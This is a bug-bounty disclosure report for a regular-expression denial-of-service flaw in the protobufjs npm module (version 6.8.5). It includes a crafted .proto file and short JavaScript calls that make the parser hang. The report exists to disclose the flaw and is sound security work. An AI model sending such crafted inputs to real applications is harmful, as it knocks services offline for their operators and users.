hackerone / chalker / H1:319576
History: Feb 25, 2018 - 5:59 p.m.

Node.js third-party modules: `protobufjs` is vulnerable to ReDoS when parsing crafted invalid *.proto files

2018-02-25 17:59:38
chalker
hackerone.com

EPSS: 0.001 (Low)
Percentile: 26.4%

I would like to report a ReDoS in protobufjs.
It allows one to cause a Denial of Service by trying to parse (or load) a crafted *.proto file.

Module

module name: protobufjs
version: 6.8.5
npm page: https://www.npmjs.com/package/[MODULE NAME]

Module Description

> Protocol Buffers are a language-neutral, platform-neutral, extensible way of serializing structured data for use in communications protocols, data storage, and more, originally designed at Google.

Module Stats

  • 22 592 downloads in the last day
  • 352 974 downloads in the last week
  • 1 321 151 downloads in the last month

~15 853 812 estimated downloads per year

Vulnerability

Vulnerability Description

ReDoS (regular expression denial of service): parsing a crafted *.proto file makes the parser spend an unbounded amount of CPU time in a regular expression match.

Steps To Reproduce:

proto file:

// awesome.proto
package awesomepackage;
syntax = "proto3";

message AwesomeMessage {
    option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}

js file:

require('protobufjs').load("./awesome.proto", () => {});

or, just with parse:

// parse() is synchronous and takes no callback: the call itself blocks the
// calling thread on the crafted option value.
require('protobufjs').parse(`
package awesomepackage;
syntax = "proto3";

message AwesomeMessage {
    option (my_option) = xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx!;
}
`);

Supporting Material/References:

  • Arch Linux Current
  • Node.js 9.5.0
  • npm 5.6.0

Wrap up

  • I contacted the maintainer to let him know: N
  • I opened an issue in the related repository: N

Impact

Denial of service: any application that parses or loads an attacker-controlled *.proto file can be made to hang in the parser's regular expression matching.
